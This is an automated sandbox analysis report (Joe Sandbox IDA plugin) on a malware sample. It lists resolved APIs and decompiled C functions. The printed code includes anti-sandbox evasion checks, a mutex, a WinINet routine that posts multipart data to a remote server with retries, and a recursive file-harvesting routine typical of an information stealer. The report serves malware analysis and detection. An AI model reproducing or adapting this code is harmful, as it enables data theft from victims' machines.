0x00406b91
0x00406b98
0x00406b9a
0x00406b9f
0x00406ba1
0x00406ba3
0x00406ba8
0x00406bbc
0x00406bc2
0x00406bd6
0x00406bd6
0x00406ba1
0x00406b98
0x00406b8f
0x00406bdc
0x00406bec
0x00406bf5
0x00000000
0x00406bf5
0x00000000
0x00406bee
0x00406bfd
0x00406c04

APIs

Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E35E38), ref: 0040C332
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E32460), ref: 0040C34A
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E331A8), ref: 0040C362
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E35E50), ref: 0040C37B
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E35E68), ref: 0040C393
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E35D60), ref: 0040C3AB
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E35E20), ref: 0040C3C4
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E35E80), ref: 0040C3DC
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E33308), ref: 0040C3F4
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,02E330A8), ref: 0040C40D
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74DF0000,VirtualAllocExNuma), ref: 0040C423
Part of subcall function 0040C2E0: LoadLibraryA.KERNELBASE(02E35C40,?,00406B72), ref: 0040C435
Part of subcall function 0040C2E0: LoadLibraryA.KERNELBASE(02E35C58,?,00406B72), ref: 0040C447
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(74B40000,02E35DD8), ref: 0040C468

Part of subcall function 00401050: GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,?,?,00406B7C,000003E8), ref: 0040106A
Part of subcall function 00401050: VirtualAllocExNuma.KERNELBASE(00000000,?,?,00406B7C,000003E8), ref: 00401071
Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082

Part of subcall function 00406AA0: GetTickCount.KERNEL32 ref: 00406AA6
Part of subcall function 00406AA0: Sleep.KERNELBASE(00002710,?,00406B84), ref: 00406AB4
Part of subcall function 00406AA0: GetTickCount.KERNEL32 ref: 00406ABA

Sleep.KERNEL32(000003E7), ref: 00406BF5

Part of subcall function 00406A10: GetUserDefaultLangID.KERNEL32 ref: 00406A1D

Part of subcall function 00406B30: CreateMutexA.KERNELBASE(00000000,00000000,02E33228,?,00406B9F), ref: 00406B3D
Part of subcall function 00406B30: GetLastError.KERNEL32(?,00406B9F), ref: 00406B43

Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E4A0D8), ref: 0040C4BD
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E49FD0), ref: 0040C4D5
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E33168), ref: 0040C4EE
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E49E68), ref: 0040C506
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E49F70), ref: 0040C51E
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E49EF8), ref: 0040C537
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E49F10), ref: 0040C54F
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E49F28), ref: 0040C567
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E49FB8), ref: 0040C580
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E4A168), ref: 0040C598
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E4A198), ref: 0040C5B0
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E4A1B0), ref: 0040C5C9
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E4A180), ref: 0040C5E1
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E33128), ref: 0040C5F9
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E4A1F8), ref: 0040C612
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(74DF0000,02E332C8), ref: 0040C62A

CreateThread.KERNELBASE(00000000,00000000,00401020,00000000,00000000,00000000), ref: 00406BBC

Part of subcall function 004068F0: GetSystemTime.KERNEL32(?,?,00000104), ref: 00406971
Part of subcall function 004068F0: lstrcat.KERNEL32(?,02E331E8), ref: 00406985
Part of subcall function 004068F0: sscanf.NTDLL ref: 004069C3
Part of subcall function 004068F0: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069D7
Part of subcall function 004068F0: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069E8
Part of subcall function 004068F0: ExitProcess.KERNEL32 ref: 00406A02

CreateThread.KERNEL32(00000000,00000000,00406650,00000000,00000000,00000000), ref: 00406BD6
ExitProcess.KERNEL32 ref: 00406C04

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: AddressProc$Time$Process$CreateExitSystem$CountFileLibraryLoadSleepThreadTick$AllocCurrentDefaultErrorLangLastMutexNumaUserVirtuallstrcatsscanf
String ID:
API String ID: 482147807-0
Opcode ID: a349654e72635f791abaff99105bb45aa78bda0ff43d1d0459ce1a65ca71d6f4
Instruction ID: 30edc539181f4161086e76151398ed8f709a9372c098ffe2502fb7c446d8bec9
Opcode Fuzzy Hash: a349654e72635f791abaff99105bb45aa78bda0ff43d1d0459ce1a65ca71d6f4
Instruction Fuzzy Hash: 2101FFB0385365AAE12037A25D17B5935685F00B49F12403BB603F81E2EEBDF460992F

Uniqueness

Uniqueness Score: -1.00%

Function 00401050, Relevance: 4.5, APIs: 3, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00401050(void* __ecx, intOrPtr _a4) {
				int _v8;
				int _t7;

				_v8 = 0;
				_t7 =  *0x41aa50(GetCurrentProcess(), 0, _a4, 0x3000, 0x40, 0, __ecx); // executed
				_v8 = _t7;
				if(_v8 == 0) {
					ExitProcess(0);
				}
				return _t7;
			}

0x00401054
0x00401071
0x00401077
0x0040107e
0x00401082
0x00401082
0x0040108b

APIs

GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,?,?,00406B7C,000003E8), ref: 0040106A
VirtualAllocExNuma.KERNELBASE(00000000,?,?,00406B7C,000003E8), ref: 00401071
ExitProcess.KERNEL32 ref: 00401082

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: a7ae97adfdcf1c4e94bd862cfdc75439cc7b9fc2d70a57af4b78a5be23439a3a
Instruction ID: cf04ec476d4c872812d4618a66134526bca4da81b147f74e7f68079ffca38a05
Opcode Fuzzy Hash: a7ae97adfdcf1c4e94bd862cfdc75439cc7b9fc2d70a57af4b78a5be23439a3a
Instruction Fuzzy Hash: C4E08670586308FFEB109F90DD09B997BA8EB04712F108054FA09A72C0C6B45A50CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 02D20DF8, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02D20223,?,?), ref: 02D20E02
SetErrorMode.KERNELBASE(00000000,?,?,02D20223,?,?), ref: 02D20E07

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 94e057b7a7d7a0ad1819ac5818d636f5023c7ee1e5149ee693a058938b509056
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 79D0123114512C77D7002A94DC09BCDBB1C9F05B6BF008011FB0DD9181C7709D4046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00406B30, Relevance: 3.0, APIs: 2, Instructions: 15
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406B30() {
				CHAR* _t1;

				_t1 =  *0x41a124; // 0x2e33228
				CreateMutexA(0, 0, _t1); // executed
				if(GetLastError() != 0xb7) {
					return 1;
				}
				return 0;
			}

0x00406b33
0x00406b3d
0x00406b4e
0x00000000
0x00406b54
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000000,02E33228,?,00406B9F), ref: 00406B3D
GetLastError.KERNEL32(?,00406B9F), ref: 00406B43

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 8b87618f3880a66b23dbcc435febca6ef014f7b8e04fe950b3c97caf62bd947d
Instruction ID: 327de0e026df715b7b38ea4147415e649a308c5b1f966a57182a2e21aaf30096
Opcode Fuzzy Hash: 8b87618f3880a66b23dbcc435febca6ef014f7b8e04fe950b3c97caf62bd947d
Instruction Fuzzy Hash: 93D012B0266205EBE7102794FC49BF637A99744701F214832F10EE61D2C669FCA0462F

Uniqueness

Uniqueness Score: -1.00%

Function 02D20920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02D20929

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
Instruction ID: 30f3d7182eefe4c983e93399632d1765ae8032794c4adb82b9e2ac84a56656d9
Opcode Fuzzy Hash: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
Instruction Fuzzy Hash: EE90026074415011D82025AC0C02B0500121751634F344B107130AD1E4D840D6400115

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404BE0, Relevance: 108.9, APIs: 56, Strings: 6, Instructions: 371
stringnetworkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00404BE0(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, int _a20, intOrPtr _a24) {
				void _v8;
				char _v516;
				void* _v520;
				char _v1028;
				void* _v1032;
				void _v1548;
				void* _v1552;
				long _v1556;
				long _v1560;
				char _v6564;
				void* _v6568;
				long _v6572;
				void _v6828;
				DWORD* _v6832;
				DWORD* _v6836;
				void* _v6840;
				intOrPtr _v6844;
				DWORD* _v6848;
				void _v8852;
				int _v8856;
				long _v8860;
				void* _t132;
				intOrPtr _t154;
				intOrPtr _t169;
				intOrPtr _t172;
				void* _t176;
				DWORD* _t204;
				char* _t207;
				char* _t219;
				intOrPtr _t221;
				intOrPtr _t225;
				char* _t239;
				intOrPtr _t248;
				char* _t251;
				void* _t275;
				void* _t276;

				_t211 = __ecx;
				E004139B0(0x2298, __ecx);
				E0040B6E0(_t211,  &_v6564, 0, 0x1388);
				E0040B720( &_v516, 0x1f4);
				E0040B720( &_v1548, 0x200);
				_v1552 = RtlAllocateHeap(GetProcessHeap(), 0, 0x800000);
				E0040B720( &_v1028, 0x1f4);
				_v520 = InternetOpenA(0, 1, 0, 0, 0);
				_v8 = 0x927c0;
				_t213 =  &_v8;
				InternetSetOptionA(_v520, 2,  &_v8, 4);
				_v6572 = 0x100;
				_v1556 = 0;
				_push("https://");
				_push(_a4);
				if( *0x41aa4c() == 0) {
					_v1556 = 1;
				}
				_t280 = _v520;
				if(_v520 != 0) {
					_t132 = E0040B8B0(_t213, _t280, 0x10);
					_t276 = _t276 + 4;
					 *0x41aa24( &_v516, _t132);
					 *0x41aa24(_v1552, "\r\n");
					 *0x41aa24(_v1552, "------");
					 *0x41aa24(_v1552,  &_v516);
					 *0x41aa24(_v1552, "--");
					 *0x41aa24(_v1552, "\r\n");
					_t248 =  *0x41a1bc; // 0x2e481f8
					 *0x41aa24( &_v1028, _t248);
					 *0x41aa24( &_v1028,  &_v516);
					if(_v1556 == 0) {
						_v6568 = InternetConnectA(_v520, _a8, 0x50, 0, 0, 3, 0, 0);
					} else {
						_v6568 = InternetConnectA(_v520, _a8, 0x1bb, 0, 0, 3, 0, 0);
					}
					if(_v6568 != 0) {
						if(_v1556 == 0) {
							_t251 =  *0x41a2d8; // 0x2e4a948
							_t219 =  *0x41a590; // 0x2e49a68
							_v1032 = HttpOpenRequestA(_v6568, _t219, _a12, _t251, 0, 0, 0x400100, 0);
						} else {
							_t239 =  *0x41a2d8; // 0x2e4a948
							_t207 =  *0x41a590; // 0x2e49a68
							_v1032 = HttpOpenRequestA(_v6568, _t207, _a12, _t239, 0, 0, 0xc00100, 0);
						}
						if(_v1032 != 0) {
							 *0x41aa24( &_v1548, "------");
							 *0x41aa24( &_v1548,  &_v516);
							 *0x41aa24( &_v1548, "\r\n");
							_t221 =  *0x41a2cc; // 0x2e490b0
							 *0x41aa24( &_v1548, _t221);
							_t154 =  *0x41a058; // 0x2e49a98
							 *0x41aa24( &_v1548, _t154);
							 *0x41aa24( &_v1548, "\"\r\n\r\n");
							 *0x41aa24( &_v1548, _a16);
							 *0x41aa24( &_v1548, "\r\n");
							 *0x41aa24( &_v1548, "------");
							 *0x41aa24( &_v1548,  &_v516);
							 *0x41aa24( &_v1548, "\r\n");
							_t225 =  *0x41a644; // 0x2e2e8c8
							 *0x41aa24( &_v1548, _t225);
							 *0x41aa24( &_v1548, _a16);
							 *0x41aa24( &_v1548, "\"\r\n");
							_t169 =  *0x41a038; // 0x2e48d20
							 *0x41aa24( &_v1548, _t169);
							 *0x41aa24( &_v1548, "\r\n");
							_t172 =  *0x41a538; // 0x2e48d50
							 *0x41aa24( &_v1548, _t172);
							 *0x41aa24( &_v1548, "\r\n\r\n");
							_t176 =  *0x41a908( &_v1548);
							_v1560 = _t176 + _a24 +  *0x41a908(_v1552);
							_v6840 = RtlAllocateHeap(GetProcessHeap(), 0, _v1560);
							memcpy(_v6840,  &_v1548,  *0x41a908( &_v1548));
							memcpy(_v6840 +  *0x41a908(_a24),  &_v1548, _a20);
							memcpy( *0x41a908( *0x41a908(_v1552)) + _a24 + _v6840,  &_v1548, _v1552);
							_v6848 = 0;
							while(_v6848 < 6) {
								HttpSendRequestA(_v1032,  &_v1028,  *0x41a908(_v1560),  &_v1028, _v6840);
								if(HttpQueryInfoA(_v1032, 0x13,  &_v6828,  &_v6572, 0) == 0) {
									L17:
									Sleep(0x7530);
									_t204 =  &(_v6848[0]);
									__eflags = _t204;
									_v6848 = _t204;
									continue;
								} else {
									_push("200");
									_push( &_v6828);
									if( *0x41aa4c() != 0) {
										goto L17;
									} else {
									}
								}
								break;
							}
							E0040B720( &_v6840, 4);
							_v6836 = 0;
							_v6832 = 0;
							_v6844 = 0x4000;
							while(1) {
								_v8856 = InternetReadFile(_v1032,  &_v8852, 0x7cf,  &_v8860);
								if(_v8856 == 0) {
									break;
								}
								_t289 = _v8860;
								if(_v8860 != 0) {
									 *((char*)(_t275 + _v8860 - 0x2290)) = 0;
									 *0x41aa24( &_v6564,  &_v8852);
									continue;
								}
								break;
							}
						}
					}
				}
				InternetCloseHandle(_v1032);
				InternetCloseHandle(_v6568);
				InternetCloseHandle(_v520);
				return E00404830(_v520, _t289,  &_v6564);
			}

0x00404be0
0x00404be8
0x00404bfc
0x00404c0d
0x00404c1e
0x00404c37
0x00404c49
0x00404c5e
0x00404c64
0x00404c6d
0x00404c7a
0x00404c80
0x00404c8a
0x00404c94
0x00404c9c
0x00404ca5
0x00404ca7
0x00404ca7
0x00404cb1
0x00404cb8
0x00404cc0
0x00404cc5
0x00404cd0
0x00404ce2
0x00404cf4
0x00404d08
0x00404d1a
0x00404d2c
0x00404d32
0x00404d40
0x00404d54
0x00404d61
0x00404da8
0x00404d63
0x00404d83
0x00404d83
0x00404db5
0x00404dc2
0x00404e00
0x00404e0b
0x00404e1f
0x00404dc4
0x00404dcf
0x00404dda
0x00404ded
0x00404ded
0x00404e2c
0x00404e3e
0x00404e52
0x00404e64
0x00404e6a
0x00404e78
0x00404e7e
0x00404e8b
0x00404e9d
0x00404eae
0x00404ec0
0x00404ed2
0x00404ee6
0x00404ef8
0x00404efe
0x00404f0c
0x00404f1d
0x00404f2f
0x00404f35
0x00404f42
0x00404f54
0x00404f5a
0x00404f67
0x00404f79
0x00404f86
0x00404fa0
0x00404fbc
0x00404fde
0x00405000
0x00405032
0x00405038
0x00405053
0x00405086
0x004050ad
0x004050c7
0x004050cc
0x0040504a
0x0040504a
0x0040504d
0x00000000
0x004050af
0x004050af
0x004050ba
0x004050c3
0x00000000
0x00000000
0x004050c5
0x004050c3
0x00000000
0x004050ad
0x004050e0
0x004050e5
0x004050ef
0x004050f9
0x00405103
0x00405123
0x00405130
0x00000000
0x00000000
0x00405132
0x00405139
0x00405143
0x00405159
0x00000000
0x00405159
0x00000000
0x00405139
0x0040513b
0x00404e2c
0x00404db5
0x00405168
0x00405175
0x00405182
0x0040519b

APIs

GetProcessHeap.KERNEL32(00000000,00800000,?,00000200,?,000001F4,?,00000000,00001388,?,?,00406843,02E32480,02E32F68,02E46EC8,?), ref: 00404C2A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C31
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404C58
InternetSetOptionA.WININET(?,00000002,000927C0,00000004), ref: 00404C7A
StrCmpCA.SHLWAPI(?,https://), ref: 00404C9D
lstrcat.KERNEL32(?,00000000), ref: 00404CD0
lstrcat.KERNEL32(?,00418B9C), ref: 00404CE2
lstrcat.KERNEL32(?,------), ref: 00404CF4
lstrcat.KERNEL32(?,?), ref: 00404D08
lstrcat.KERNEL32(?,00418BA8), ref: 00404D1A
lstrcat.KERNEL32(?,00418B9C), ref: 00404D2C
lstrcat.KERNEL32(?,02E481F8), ref: 00404D40
lstrcat.KERNEL32(?,?), ref: 00404D54
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 00404D7D
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00404DA2
HttpOpenRequestA.WININET(00000000,02E49A68,?,02E4A948,00000000,00000000,00C00100,00000000), ref: 00404DE7
HttpOpenRequestA.WININET(00000000,02E49A68,?,02E4A948,00000000,00000000,00400100,00000000), ref: 00404E19
lstrcat.KERNEL32(?,------), ref: 00404E3E
lstrcat.KERNEL32(?,?), ref: 00404E52
lstrcat.KERNEL32(?,00418B9C), ref: 00404E64
lstrcat.KERNEL32(?,02E490B0), ref: 00404E78
lstrcat.KERNEL32(?,02E49A98), ref: 00404E8B
lstrcat.KERNEL32(?,"), ref: 00404E9D
lstrcat.KERNEL32(?,?), ref: 00404EAE
lstrcat.KERNEL32(?,00418B9C), ref: 00404EC0
lstrcat.KERNEL32(?,------), ref: 00404ED2
lstrcat.KERNEL32(?,?), ref: 00404EE6
lstrcat.KERNEL32(?,00418B9C), ref: 00404EF8
lstrcat.KERNEL32(?,02E2E8C8), ref: 00404F0C
lstrcat.KERNEL32(?,?), ref: 00404F1D
lstrcat.KERNEL32(?,"), ref: 00404F2F
lstrcat.KERNEL32(?,02E48D20), ref: 00404F42
lstrcat.KERNEL32(?,00418B9C), ref: 00404F54
lstrcat.KERNEL32(?,02E48D50), ref: 00404F67
lstrcat.KERNEL32(?,), ref: 00404F79
lstrlen.KERNEL32(?), ref: 00404F86
lstrlen.KERNEL32(?), ref: 00404F98
GetProcessHeap.KERNEL32(00000000,?), ref: 00404FAF
RtlAllocateHeap.NTDLL(00000000), ref: 00404FB6
lstrlen.KERNEL32(?), ref: 00404FC9
memcpy.NTDLL(?,?,00000000), ref: 00404FDE
lstrlen.KERNEL32(?,?,?), ref: 00404FF3
memcpy.NTDLL(?), ref: 00405000
lstrlen.KERNEL32(?), ref: 0040500D
lstrlen.KERNEL32(?,?,00000000), ref: 00405022
memcpy.NTDLL(?), ref: 00405032
lstrlen.KERNEL32(?,?,?), ref: 00405071
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00405086
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004050A5
StrCmpCA.SHLWAPI(?,200), ref: 004050BB
Sleep.KERNEL32(00007530), ref: 004050CC
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040511D
lstrcat.KERNEL32(?,00000000), ref: 00405159
InternetCloseHandle.WININET(?), ref: 00405168
InternetCloseHandle.WININET(?), ref: 00405175
InternetCloseHandle.WININET(00000000), ref: 00405182

Strings

200, xrefs: 004050AF
, xrefs: 00404F6D
https://, xrefs: 00404C94
------, xrefs: 00404CE8, 00404E32, 00404EC6
", xrefs: 00404F23
", xrefs: 00404E91

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Internet$lstrlen$HeapHttp$CloseHandleOpenRequestmemcpy$AllocateConnectProcess$FileInfoOptionQueryReadSendSleep
String ID: $"$"$------$200$https://
API String ID: 3074752877-1022799444
Opcode ID: 7e193f7b750088dcc95744bcbbb277857cdff21b1dcf883b5ec6c60b5828c7ff
Instruction ID: e23421f7279307ab3a44037bb1bbfee425b9f76c6f481fad167fe3b69a740ec5
Opcode Fuzzy Hash: 7e193f7b750088dcc95744bcbbb277857cdff21b1dcf883b5ec6c60b5828c7ff
Instruction Fuzzy Hash: BDF176B5A51218AFCB20DFA0DD48FDB7779AF48704F0085D9F209A7181CB78AA94CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10, Relevance: 43.8, APIs: 29, Instructions: 277libraryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094,?,00000094), ref: 00406C3D
LoadLibraryA.KERNEL32(02E4A060), ref: 00406CAA

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: LibraryLoadVersion
String ID:
API String ID: 3209957514-0
Opcode ID: 48e87a5de84f717074b832ed21c0577e90c690f55c8f4d6b53ea31534da44a6a
Instruction ID: 05bfa34741bdcc6f61b31b7f22c3a432e1b570a345a4de00ebc14ecdda937758
Opcode Fuzzy Hash: 48e87a5de84f717074b832ed21c0577e90c690f55c8f4d6b53ea31534da44a6a
Instruction Fuzzy Hash: 6BC182B1612208ABDB54DF90DD88FDA77B9EF4C304F1085A9F205A72D0C774AA91CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004087E0, Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 337
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004087E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, signed int _a32, signed int _a36) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				char _v1388;
				void* _t121;
				signed int _t122;
				int _t124;
				signed int _t126;
				intOrPtr _t129;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t146;
				intOrPtr _t200;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t276;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t273 = _t272 + 0xc;
				_t121 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t121;
				if(_v272 != 0xffffffff) {
					goto L2;
				} else {
					return _t121;
				}
				do {
					L2:
					_t122 =  *0x41aa4c( &(_v596.cFileName), 0x414010);
					__eflags = _t122;
					if(_t122 == 0) {
						L4:
						goto L22;
					}
					_t126 =  *0x41aa4c( &(_v596.cFileName), 0x414014);
					__eflags = _t126;
					if(_t126 != 0) {
						wsprintfA( &_v860, "%s\%s");
						_t273 = _t273 + 0x10;
						_t129 =  *0x41a534; // 0x2e4a4e0
						__eflags =  *0x41aa4c( &(_v596.cFileName), _t129, _a8,  &(_v596.cFileName));
						if(__eflags != 0) {
							_t200 =  *0x41a050; // 0x2e49c68
							__eflags =  *0x41aa4c( &(_v596.cFileName), _t200);
							if(__eflags != 0) {
								_t132 =  *0x41a5ac; // 0x2e4a498
								__eflags =  *0x41aa4c( &(_v596.cFileName), _t132);
								if(__eflags != 0) {
									_t134 =  *0x41a360; // 0x2e49d08
									__eflags =  *0x41aa4c( &(_v596.cFileName), _t134);
									if(__eflags != 0) {
										__eflags = _v596.dwFileAttributes & 0x00000010;
										if((_v596.dwFileAttributes & 0x00000010) != 0) {
											E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
											_t273 = _t273 + 0x24;
										}
									} else {
										GetCurrentDirectoryA(0x104,  &_v1388);
										 *0x41aa24( &_v1388, 0x414018);
										_t146 = E0040B8B0( &(_v596.cFileName), __eflags, 8);
										_t274 = _t273 + 4;
										 *0x41aa24( &_v1388, _t146);
										CopyFileA( &_v860,  &_v1388, 1);
										__eflags = _a36;
										if(__eflags != 0) {
											E00408510(_a12, __eflags,  &_v1388, _a4, _a12, _a16, _a20, _a24);
											_t274 = _t274 + 0x18;
										}
										__eflags = _a28;
										if(__eflags != 0) {
											E00408650(_a12, __eflags,  &_v1388, _a4, _a12, _a16, _a20, _a24);
											_t274 = _t274 + 0x18;
										}
										DeleteFileA( &_v1388);
										E0040B720( &_v1388, 0x104);
										E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
										_t273 = _t274 + 0x24;
									}
								} else {
									GetCurrentDirectoryA(0x104,  &_v1124);
									 *0x41aa24( &_v1124, 0x414018);
									 *0x41aa24( &_v1124, E0040B8B0( &(_v596.cFileName), __eflags, 8));
									CopyFileA( &_v860,  &_v1124, 1);
									E004082E0(_a12, __eflags,  &_v1124, _a4, _a12, _a16, _a20, _a24);
									_t276 = _t273 + 0x1c;
									__eflags = _a32;
									if(__eflags != 0) {
										E00408150(_a12, __eflags,  &_v1124, _a4, _a12, _a16, _a20, _a24);
										_t276 = _t276 + 0x18;
									}
									DeleteFileA( &_v1124);
									E0040B720( &_v1124, 0x104);
									E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
									_t273 = _t276 + 0x24;
								}
							} else {
								E00407D50(__eflags,  &_v860, _a4, _a12, _a16, _a20, _a24);
								E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
								_t273 = _t273 + 0x3c;
							}
						} else {
							E00407AC0(_a12, __eflags, _a4,  &_v860, _a12, _a16, _a20);
							E004087E0( &(_v596.cFileName),  &_v860, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
							_t273 = _t273 + 0x38;
						}
						E0040B720( &_v860, 0x104);
						goto L22;
					}
					goto L4;
					L22:
					_t124 = FindNextFileA(_v272,  &_v596);
					__eflags = _t124;
				} while (_t124 != 0);
				return FindClose(_v272);
			}

0x004087ec
0x004087f9
0x004087ff
0x00408810
0x00408816
0x00408823
0x00000000
0x00000000
0x00000000
0x00000000
0x0040882a
0x0040882a
0x00408836
0x0040883c
0x0040883e
0x00408856
0x00000000
0x00408856
0x0040884c
0x00408852
0x00408854
0x00408872
0x00408878
0x0040887b
0x0040888e
0x00408890
0x004088e8
0x004088fc
0x004088fe
0x0040895a
0x0040896d
0x0040896f
0x00408a68
0x00408a7b
0x00408a7d
0x00408b7f
0x00408b82
0x00408bae
0x00408bb3
0x00408bb3
0x00408a83
0x00408a8f
0x00408aa1
0x00408aa9
0x00408aae
0x00408ab9
0x00408acf
0x00408ad5
0x00408ad9
0x00408af6
0x00408afb
0x00408afb
0x00408afe
0x00408b02
0x00408b1f
0x00408b24
0x00408b24
0x00408b2e
0x00408b40
0x00408b6f
0x00408b74
0x00408b74
0x00408975
0x00408981
0x00408993
0x004089ab
0x004089c1
0x004089e2
0x004089e7
0x004089ea
0x004089ee
0x00408a0b
0x00408a10
0x00408a10
0x00408a1a
0x00408a2c
0x00408a5b
0x00408a60
0x00408a60
0x00408900
0x0040891b
0x0040894d
0x00408952
0x00408952
0x00408892
0x004088a9
